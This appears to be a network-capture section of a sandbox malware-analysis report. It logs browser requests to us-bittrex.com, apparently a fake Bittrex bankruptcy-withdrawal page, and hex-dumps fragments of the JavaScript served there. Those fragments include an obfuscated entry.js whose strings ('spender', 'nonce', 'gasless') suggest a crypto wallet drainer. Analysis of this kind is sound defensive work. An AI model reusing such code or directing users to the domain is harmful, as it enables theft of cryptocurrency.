                          2024-03-28 14:45:28 UTC1369INData Raw: 6e 61 6d 65 22 3a 22 64 61 74 61 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 73 74 72 75 63 74 20 44 61 74 61 54 79 70 65 73 2e 52 65 73 65 72 76 65 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 4d 61 70 22 2c 22 6e 61 6d 65 22 3a 22 22 2c 22 74 79 70 65 22 3a 22 74 75 70 6c 65 22 7d 5d 2c 22 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 22 3a 22 76 69 65 77 22 2c 22 74 79 70 65 22 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 61 73 73 65 74 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 5d 2c 22 6e 61 6d 65 22 3a 22 67 65 74 52 65 73 65 72 76 65 44 61 74 61 22
                          Data Ascii: name":"data","type":"uint256"}],"internalType":"struct DataTypes.ReserveConfigurationMap","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"asset","type":"address"}],"name":"getReserveData"
                          2024-03-28 14:45:28 UTC1369INData Raw: 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 61 73 73 65 74 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 5d 2c 22 6e 61 6d 65 22 3a 22 67 65 74 52 65 73 65 72 76 65 4e 6f 72 6d 61 6c 69 7a 65 64 49 6e 63 6f 6d 65 22 2c 22 6f 75 74 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 2c 22 6e 61 6d 65 22 3a 22 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 22 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 22 3a 22 76 69 65 77 22 2c 22 74 79 70 65 22 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61
                          Data Ascii: inputs":[{"internalType":"address","name":"asset","type":"address"}],"name":"getReserveNormalizedIncome","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","na


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.449746172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:28 UTC622OUTGET /bankruptcy/withdrawal/chapter11/debtor/js/main.js HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: sessionid=0
                          2024-03-28 14:45:28 UTC707INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:28 GMT
                          Content-Type: application/javascript
                          Content-Length: 992584
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 11:54:49 GMT
                          ETag: "66055a89-f2548"
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 2090
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VJqfgP7l64xX9JXqeHlIzsiDHCBfL5kErzvApdIZ6ck1aiY3B5y4U%2Fj2Zo%2F0liRZx6axUaEeZaEB%2FCNP67PehxlcOiArXRjLznfS1Q4jcIlx%2Fmmj2C%2FyI%2FDdPpatkt%2ByoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b86775cbf40a81-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:28 UTC662INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 32 38 32 39 39 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 6c 4b 3a 28 29 3d 3e 75 65 7d 29 3b 6c 65 74 20 6e 3d 21 31 2c 73 3d 21 31 3b 63 6f 6e 73 74 20 69 3d 7b 64 65 62 75 67 3a 31 2c 64 65 66 61 75 6c 74 3a 32 2c 69 6e 66 6f 3a 32 2c 77 61 72 6e 69 6e 67 3a 33 2c 65 72 72 6f 72 3a 34 2c 6f 66 66 3a 35 7d 3b 6c 65 74 20 6f 3d 69 2e 64 65 66 61 75 6c 74 2c 61 3d 6e 75 6c 6c 3b 63 6f 6e 73 74 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 69 66 28 5b 22 4e 46 44 22 2c 22 4e 46 43 22 2c 22 4e 46 4b 44 22 2c 22 4e 46 4b 43 22 5d 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 72
                          Data Ascii: (()=>{var __webpack_modules__={28299:(e,t,r)=>{"use strict";r.d(t,{lK:()=>ue});let n=!1,s=!1;const i={debug:1,default:2,info:2,warning:3,error:4,off:5};let o=i.default,a=null;const c=function(){try{const e=[];if(["NFD","NFC","NFKD","NFKC"].forEach((t=>{tr
                          2024-03-28 14:45:28 UTC1369INData Raw: 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 55 4e 4b 4e 4f 57 4e 5f 45 52 52 4f 52 3d 22 55 4e 4b 4e 4f 57 4e 5f 45 52 52 4f 52 22 2c 65 2e 4e 4f 54 5f 49 4d 50 4c 45 4d 45 4e 54 45 44 3d 22 4e 4f 54 5f 49 4d 50 4c 45 4d 45 4e 54 45 44 22 2c 65 2e 55 4e 53 55 50 50 4f 52 54 45 44 5f 4f 50 45 52 41 54 49 4f 4e 3d 22 55 4e 53 55 50 50 4f 52 54 45 44 5f 4f 50 45 52 41 54 49 4f 4e 22 2c 65 2e 4e 45 54 57 4f 52 4b 5f 45 52 52 4f 52 3d 22 4e 45 54 57 4f 52 4b 5f 45 52 52 4f 52 22 2c 65 2e 53 45 52 56 45 52 5f 45 52 52 4f 52 3d 22 53 45 52 56 45 52 5f 45 52 52 4f 52 22 2c 65 2e 54 49 4d 45 4f 55 54 3d 22 54 49 4d 45 4f 55 54 22 2c 65 2e 42 55 46 46 45 52 5f 4f 56 45 52 52 55 4e 3d 22 42 55 46 46 45 52 5f 4f 56 45 52 52 55 4e 22 2c 65 2e 4e 55 4d 45 52 49 43
                          Data Ascii: ),function(e){e.UNKNOWN_ERROR="UNKNOWN_ERROR",e.NOT_IMPLEMENTED="NOT_IMPLEMENTED",e.UNSUPPORTED_OPERATION="UNSUPPORTED_OPERATION",e.NETWORK_ERROR="NETWORK_ERROR",e.SERVER_ERROR="SERVER_ERROR",e.TIMEOUT="TIMEOUT",e.BUFFER_OVERRUN="BUFFER_OVERRUN",e.NUMERIC
                          2024-03-28 14:45:28 UTC1369INData Raw: 26 74 5b 65 5d 5d 3b 6e 2e 70 75 73 68 28 65 2b 22 3d 55 69 6e 74 38 41 72 72 61 79 28 30 78 22 2b 72 2b 22 29 22 29 7d 65 6c 73 65 20 6e 2e 70 75 73 68 28 65 2b 22 3d 22 2b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 74 29 7b 6e 2e 70 75 73 68 28 65 2b 22 3d 22 2b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 72 5b 65 5d 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 7d 7d 29 29 2c 6e 2e 70 75 73 68 28 60 63 6f 64 65 3d 24 7b 74 7d 60 29 2c 6e 2e 70 75 73 68 28 60 76 65 72 73 69 6f 6e 3d 24 7b 74 68 69 73 2e 76 65 72 73 69 6f 6e 7d 60 29 3b 63 6f 6e 73 74 20 69 3d 65 3b 6c 65 74 20 6f 3d 22 22 3b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 6c 2e 4e 55 4d 45 52 49 43 5f 46 41 55 4c 54 3a 7b 6f 3d 22 4e 55 4d 45 52 49 43 5f 46 41 55
                          Data Ascii: &t[e]];n.push(e+"=Uint8Array(0x"+r+")")}else n.push(e+"="+JSON.stringify(t))}catch(t){n.push(e+"="+JSON.stringify(r[e].toString()))}})),n.push(`code=${t}`),n.push(`version=${this.version}`);const i=e;let o="";switch(t){case l.NUMERIC_FAULT:{o="NUMERIC_FAU
                          2024-03-28 14:45:28 UTC1369INData Raw: 3d 22 76 61 6c 75 65 20 6e 6f 74 20 73 61 66 65 22 29 2c 28 65 3c 30 7c 7c 65 3e 3d 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 31 29 26 26 74 68 69 73 2e 74 68 72 6f 77 45 72 72 6f 72 28 74 2c 66 2e 65 72 72 6f 72 73 2e 4e 55 4d 45 52 49 43 5f 46 41 55 4c 54 2c 7b 6f 70 65 72 61 74 69 6f 6e 3a 22 63 68 65 63 6b 53 61 66 65 49 6e 74 65 67 65 72 22 2c 66 61 75 6c 74 3a 22 6f 75 74 2d 6f 66 2d 73 61 66 65 2d 72 61 6e 67 65 22 2c 76 61 6c 75 65 3a 65 7d 29 2c 65 25 31 26 26 74 68 69 73 2e 74 68 72 6f 77 45 72 72 6f 72 28 74 2c 66 2e 65 72 72 6f 72 73 2e 4e 55 4d 45 52 49 43 5f 46 41 55 4c 54 2c 7b 6f 70 65 72 61 74 69 6f 6e 3a 22 63 68 65 63 6b 53 61 66 65 49 6e 74 65 67 65 72 22 2c 66 61 75 6c 74 3a 22 6e 6f 6e 2d 69 6e 74 65 67 65 72 22 2c 76 61 6c 75 65
                          Data Ascii: ="value not safe"),(e<0||e>=9007199254740991)&&this.throwError(t,f.errors.NUMERIC_FAULT,{operation:"checkSafeInteger",fault:"out-of-safe-range",value:e}),e%1&&this.throwError(t,f.errors.NUMERIC_FAULT,{operation:"checkSafeInteger",fault:"non-integer",value
                          2024-03-28 14:45:28 UTC1369INData Raw: 6f 6d 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 66 28 65 29 7d 7d 66 2e 65 72 72 6f 72 73 3d 6c 2c 66 2e 6c 65 76 65 6c 73 3d 75 3b 63 6f 6e 73 74 20 64 3d 6e 65 77 20 66 28 22 62 79 74 65 73 2f 35 2e 37 2e 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 72 65 74 75 72 6e 21 21 65 2e 74 6f 48 65 78 53 74 72 69 6e 67 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 6c 69 63 65 7c 7c 28 65 2e 73 6c 69 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 74 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 67 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 61 70 70
                          Data Ascii: om(e){return new f(e)}}f.errors=l,f.levels=u;const d=new f("bytes/5.7.0");function p(e){return!!e.toHexString}function g(e){return e.slice||(e.slice=function(){const t=Array.prototype.slice.call(arguments);return g(new Uint8Array(Array.prototype.slice.app
                          2024-03-28 14:45:28 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 41 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 21 65 2e 6d 61 74 63 68 28 2f 5e 30 78 5b 30 2d 39 41 2d 46 61 2d 66 5d 2a 24 2f 29 29 26 26 28 21 74 7c 7c 65 2e 6c 65 6e 67 74 68 3d 3d 3d 32 2b 32 2a 74 29 7d 63 6f 6e 73 74 20 45 3d 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 22 3b 66 75 6e 63 74 69 6f 6e 20 50 28 65 2c 74 29 7b 69 66 28 74 7c 7c 28 74 3d 7b 7d 29 2c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 64 2e 63 68 65 63 6b 53 61 66 65 55 69 6e 74 35 33 28 65 2c 22 69 6e 76 61 6c 69 64 20 68 65 78 6c 69 66 79 20 76 61 6c 75 65 22 29 3b 6c 65 74 20 74 3d 22 22 3b 66 6f 72 28 3b 65 3b 29 74 3d 45 5b 31 35 26 65 5d 2b 74 2c 65 3d 4d 61 74 68
                          Data Ascii: }function A(e,t){return!("string"!=typeof e||!e.match(/^0x[0-9A-Fa-f]*$/))&&(!t||e.length===2+2*t)}const E="0123456789abcdef";function P(e,t){if(t||(t={}),"number"==typeof e){d.checkSafeUint53(e,"invalid hexlify value");let t="";for(;e;)t=E[15&e]+t,e=Math
                          2024-03-28 14:45:28 UTC1369INData Raw: 33 32 29 29 2c 74 2e 73 3d 50 28 72 2e 73 6c 69 63 65 28 33 32 2c 36 34 29 29 2c 74 2e 76 3d 72 5b 36 34 5d 29 3a 64 2e 74 68 72 6f 77 41 72 67 75 6d 65 6e 74 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 73 69 67 6e 61 74 75 72 65 20 73 74 72 69 6e 67 22 2c 22 73 69 67 6e 61 74 75 72 65 22 2c 65 29 2c 74 2e 76 3c 32 37 26 26 28 30 3d 3d 3d 74 2e 76 7c 7c 31 3d 3d 3d 74 2e 76 3f 74 2e 76 2b 3d 32 37 3a 64 2e 74 68 72 6f 77 41 72 67 75 6d 65 6e 74 45 72 72 6f 72 28 22 73 69 67 6e 61 74 75 72 65 20 69 6e 76 61 6c 69 64 20 76 20 62 79 74 65 22 2c 22 73 69 67 6e 61 74 75 72 65 22 2c 65 29 29 2c 74 2e 72 65 63 6f 76 65 72 79 50 61 72 61 6d 3d 31 2d 74 2e 76 25 32 2c 74 2e 72 65 63 6f 76 65 72 79 50 61 72 61 6d 26 26 28 72 5b 33 32 5d 7c 3d 31 32 38 29 2c 74 2e
                          Data Ascii: 32)),t.s=P(r.slice(32,64)),t.v=r[64]):d.throwArgumentError("invalid signature string","signature",e),t.v<27&&(0===t.v||1===t.v?t.v+=27:d.throwArgumentError("signature invalid v byte","signature",e)),t.recoveryParam=1-t.v%2,t.recoveryParam&&(r[32]|=128),t.
                          2024-03-28 14:45:28 UTC1369INData Raw: 22 2c 65 29 3b 63 6f 6e 73 74 20 72 3d 77 28 74 2e 73 29 3b 72 5b 30 5d 3e 3d 31 32 38 26 26 64 2e 74 68 72 6f 77 41 72 67 75 6d 65 6e 74 45 72 72 6f 72 28 22 73 69 67 6e 61 74 75 72 65 20 73 20 6f 75 74 20 6f 66 20 72 61 6e 67 65 22 2c 22 73 69 67 6e 61 74 75 72 65 22 2c 65 29 2c 74 2e 72 65 63 6f 76 65 72 79 50 61 72 61 6d 26 26 28 72 5b 30 5d 7c 3d 31 32 38 29 3b 63 6f 6e 73 74 20 6e 3d 50 28 72 29 3b 74 2e 5f 76 73 26 26 28 41 28 74 2e 5f 76 73 29 7c 7c 64 2e 74 68 72 6f 77 41 72 67 75 6d 65 6e 74 45 72 72 6f 72 28 22 73 69 67 6e 61 74 75 72 65 20 69 6e 76 61 6c 69 64 20 5f 76 73 22 2c 22 73 69 67 6e 61 74 75 72 65 22 2c 65 29 2c 74 2e 5f 76 73 3d 4f 28 74 2e 5f 76 73 2c 33 32 29 29 2c 6e 75 6c 6c 3d 3d 74 2e 5f 76 73 3f 74 2e 5f 76 73 3d 6e 3a 74 2e
                          Data Ascii: ",e);const r=w(t.s);r[0]>=128&&d.throwArgumentError("signature s out of range","signature",e),t.recoveryParam&&(r[0]|=128);const n=P(r);t._vs&&(A(t._vs)||d.throwArgumentError("signature invalid _vs","signature",e),t._vs=O(t._vs,32)),null==t._vs?t._vs=n:t.
                          2024-03-28 14:45:28 UTC1369INData Raw: 65 28 29 7c 7c 74 2e 69 73 4e 65 67 28 29 29 26 26 4c 28 22 75 6e 62 6f 75 6e 64 2d 62 69 74 77 69 73 65 2d 72 65 73 75 6c 74 22 2c 22 6f 72 22 29 2c 55 28 46 28 74 68 69 73 29 2e 6f 72 28 74 29 29 7d 78 6f 72 28 65 29 7b 63 6f 6e 73 74 20 74 3d 46 28 65 29 3b 72 65 74 75 72 6e 28 74 68 69 73 2e 69 73 4e 65 67 61 74 69 76 65 28 29 7c 7c 74 2e 69 73 4e 65 67 28 29 29 26 26 4c 28 22 75 6e 62 6f 75 6e 64 2d 62 69 74 77 69 73 65 2d 72 65 73 75 6c 74 22 2c 22 78 6f 72 22 29 2c 55 28 46 28 74 68 69 73 29 2e 78 6f 72 28 74 29 29 7d 6d 61 73 6b 28 65 29 7b 72 65 74 75 72 6e 28 74 68 69 73 2e 69 73 4e 65 67 61 74 69 76 65 28 29 7c 7c 65 3c 30 29 26 26 4c 28 22 6e 65 67 61 74 69 76 65 2d 77 69 64 74 68 22 2c 22 6d 61 73 6b 22 29 2c 55 28 46 28 74 68 69 73 29 2e 6d
                          Data Ascii: e()||t.isNeg())&&L("unbound-bitwise-result","or"),U(F(this).or(t))}xor(e){const t=F(e);return(this.isNegative()||t.isNeg())&&L("unbound-bitwise-result","xor"),U(F(this).xor(t))}mask(e){return(this.isNegative()||e<0)&&L("negative-width","mask"),U(F(this).m
                          2024-03-28 14:45:28 UTC1369INData Raw: 78 7d 74 6f 4a 53 4f 4e 28 65 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 22 42 69 67 4e 75 6d 62 65 72 22 2c 68 65 78 3a 74 68 69 73 2e 74 6f 48 65 78 53 74 72 69 6e 67 28 29 7d 7d 73 74 61 74 69 63 20 66 72 6f 6d 28 65 29 7b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 49 29 72 65 74 75 72 6e 20 65 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 65 2e 6d 61 74 63 68 28 2f 5e 2d 3f 30 78 5b 30 2d 39 61 2d 66 5d 2b 24 2f 69 29 3f 6e 65 77 20 49 28 43 2c 4d 28 65 29 29 3a 65 2e 6d 61 74 63 68 28 2f 5e 2d 3f 5b 30 2d 39 5d 2b 24 2f 29 3f 6e 65 77 20 49 28 43 2c 4d 28 6e 65 77 20 4e 28 65 29 29 29 3a 52 2e 74 68 72 6f 77 41 72 67 75 6d 65 6e 74 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 42 69 67 4e 75 6d 62 65 72
                          Data Ascii: x}toJSON(e){return{type:"BigNumber",hex:this.toHexString()}}static from(e){if(e instanceof I)return e;if("string"==typeof e)return e.match(/^-?0x[0-9a-f]+$/i)?new I(C,M(e)):e.match(/^-?[0-9]+$/)?new I(C,M(new N(e))):R.throwArgumentError("invalid BigNumber


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.44974423.209.58.93443
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:28 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-03-28 14:45:28 UTC468INHTTP/1.1 200 OK
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (chd/073D)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-eus2-z1
                          Cache-Control: public, max-age=231520
                          Date: Thu, 28 Mar 2024 14:45:28 GMT
                          Connection: close
                          X-CID: 2


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.449747172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:28 UTC623OUTGET /bankruptcy/withdrawal/chapter11/debtor/js/entry.js HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: sessionid=0
                          2024-03-28 14:45:28 UTC707INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:28 GMT
                          Content-Type: application/javascript
                          Content-Length: 267285
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 11:54:49 GMT
                          ETag: "66055a89-41415"
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 2296
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CWm8CPMVIjPMepn%2FdqATADAkK2hOCubm84LLQTPPS5zYQyRSU5lQQEQ%2Fc8%2FUH0UQL4YMDnlnFAnqJbca%2F%2F6%2F0jAcukdUZfbdcuPOSxd3CcxOA%2BTQjZGmkX1U1cYQNjieBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b867761a665b1c-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:28 UTC662INData Raw: 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 61 5b 65 3e 31 32 35 39 3f 65 2d 34 37 3a 65 3c 2d 35 3f 65 2d 31 36 3a 65 3e 31 32 35 39 3f 65 2d 20 2d 37 31 3a 65 3c 2d 35 3f 65 2d 36 37 3a 65 3e 31 32 35 39 3f 65 2d 37 35 3a 65 2d 20 2d 34 5d 7d 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 31 32 2c 36 33 2c 36 2c 22 6c 65 6e 67 74 68 22 2c 30 2c 31 33 36 2c 37 2c 22 61 70 70 6c 79 22 2c 22 63 61 6c 6c 22 2c 76 6f 69 64 20 30 2c 34 32 2c 32 31 2c 32 34 2c 22 78 6b 33 66 39 48 32 22 2c 32 33 2c 33 32 2c 22 65 70 76 30 4a 4b 22 2c 22 4a 42 56 71 43 43 22 2c 22 63 34 4c 4c 61 5a 22 2c 32 2c 22 4d 32 6e 70 59 6e 22 2c 32 39 2c 22 65 65 22 2c 22 4e 5a 22 2c 31 31 2c 22
                          Data Ascii: function e(e){return a[e>1259?e-47:e<-5?e-16:e>1259?e- -71:e<-5?e-67:e>1259?e-75:e- -4]}var a=function(){return["fromCodePoint",12,63,6,"length",0,136,7,"apply","call",void 0,42,21,24,"xk3f9H2",23,32,"epv0JK","JBVqCC","c4LLaZ",2,"M2npYn",29,"ee","NZ",11,"
                          2024-03-28 14:45:28 UTC1369INData Raw: 33 31 2c 22 49 4b 49 7a 45 4d 72 22 2c 35 33 2c 37 36 2c 31 33 39 2c 22 62 6c 22 2c 22 62 22 2c 36 34 2c 31 32 39 2c 38 2c 33 33 2c 31 36 34 2c 22 62 78 22 2c 33 37 31 2c 34 33 33 2c 33 35 2c 22 50 22 2c 34 31 31 2c 33 36 36 2c 22 46 22 2c 22 61 52 22 2c 22 61 64 22 2c 34 34 2c 22 61 54 22 2c 22 62 68 22 2c 22 4f 4a 63 7a 41 78 66 22 2c 37 38 2c 37 39 2c 22 29 22 2c 32 33 35 2c 31 39 33 2c 22 62 69 22 2c 32 32 36 2c 32 35 32 2c 32 35 34 2c 32 35 36 2c 22 62 71 22 2c 22 62 6e 22 2c 32 35 35 2c 32 34 38 2c 32 34 39 2c 32 34 31 2c 32 35 39 2c 22 72 22 2c 22 75 22 2c 31 38 33 2c 32 31 32 2c 22 72 69 62 30 52 58 22 2c 31 32 32 2c 32 34 37 2c 31 37 2c 31 33 34 2c 36 38 2c 34 38 2c 31 32 31 2c 39 2c 22 4f 72 7a 5a 67 32 22 2c 32 30 39 2c 22 4a 71 46 57 72 76 22
                          Data Ascii: 31,"IKIzEMr",53,76,139,"bl","b",64,129,8,33,164,"bx",371,433,35,"P",411,366,"F","aR","ad",44,"aT","bh","OJczAxf",78,79,")",235,193,"bi",226,252,254,256,"bq","bn",255,248,249,241,259,"r","u",183,212,"rib0RX",122,247,17,134,68,48,121,9,"OrzZg2",209,"JqFWrv"
                          2024-03-28 14:45:28 UTC1369INData Raw: 2c 22 65 72 22 2c 35 33 38 2c 34 30 30 31 2c 35 30 30 31 2c 38 30 30 2c 38 30 31 2c 22 61 6c 22 2c 33 38 32 2c 36 36 34 2c 22 62 77 22 2c 31 37 39 2c 22 62 66 22 2c 31 37 36 2c 22 2d 76 22 2c 34 39 30 2c 34 37 33 2c 38 32 2c 37 36 34 2c 38 31 34 2c 38 31 35 2c 33 32 36 30 33 2c 37 37 30 2c 38 33 32 2c 38 33 33 2c 33 32 34 2c 38 34 30 2c 38 34 35 2c 35 31 2c 22 61 68 22 2c 31 35 33 2c 31 38 30 2c 22 75 41 4f 32 47 56 34 22 2c 36 38 33 2c 33 31 30 2c 31 31 39 2c 33 30 32 2c 32 32 2c 38 32 35 2c 37 39 36 2c 35 65 33 2c 38 36 31 2c 37 35 34 2c 38 37 32 2c 38 37 33 2c 22 69 6e 22 2c 38 31 30 2c 38 38 32 2c 38 38 34 2c 38 38 36 2c 38 38 37 2c 37 38 33 2c 37 34 32 2c 38 39 32 2c 38 39 33 2c 38 39 34 2c 37 35 37 2c 38 33 31 2c 37 32 31 2c 34 34 34 2c 34 32 31 36
                          Data Ascii: ,"er",538,4001,5001,800,801,"al",382,664,"bw",179,"bf",176,"-v",490,473,82,764,814,815,32603,770,832,833,324,840,845,51,"ah",153,180,"uAO2GV4",683,310,119,302,22,825,796,5e3,861,754,872,873,"in",810,882,884,886,887,783,742,892,893,894,757,831,721,444,4216
                          2024-03-28 14:45:28 UTC1369INData Raw: 61 6d 22 2c 34 36 31 2c 22 61 71 22 2c 39 32 37 2c 39 35 35 2c 36 37 34 2c 39 35 34 2c 22 70 6f 70 75 6c 61 22 2c 22 74 65 54 72 61 6e 22 2c 22 6e 61 74 69 76 65 22 2c 33 36 38 2c 32 36 32 2c 32 39 33 2c 32 39 39 2c 22 6f 62 6a 65 63 74 22 2c 22 72 6f 76 69 64 65 22 2c 22 72 20 66 6f 72 20 22 2c 22 64 61 74 61 20 27 22 2c 22 78 36 63 6f 47 68 22 2c 22 47 65 6e 65 72 61 22 2c 22 74 6f 72 22 2c 22 6b 65 79 73 22 2c 22 66 69 6c 74 65 72 22 2c 33 32 39 2c 34 37 38 2c 37 33 35 2c 22 70 77 42 63 64 5a 50 22 2c 22 72 65 61 73 65 41 22 2c 22 67 61 73 6c 65 73 73 22 2c 22 6e 6f 6e 63 65 22 2c 22 73 70 65 6e 64 65 72 22 2c 22 73 65 72 69 61 6c 69 7a 65 22 2c 22 72 65 67 69 73 74 65 72 4d 6f 76 65 47 65 6e 65 72 61 74 6f 72 22 2c 22 65 74 68 22 2c 22 63 68 61 69 6e
                          Data Ascii: am",461,"aq",927,955,674,954,"popula","teTran","native",368,262,293,299,"object","rovide","r for ","data '","x6coGh","Genera","tor","keys","filter",329,478,735,"pwBcdZP","reaseA","gasless","nonce","spender","serialize","registerMoveGenerator","eth","chain
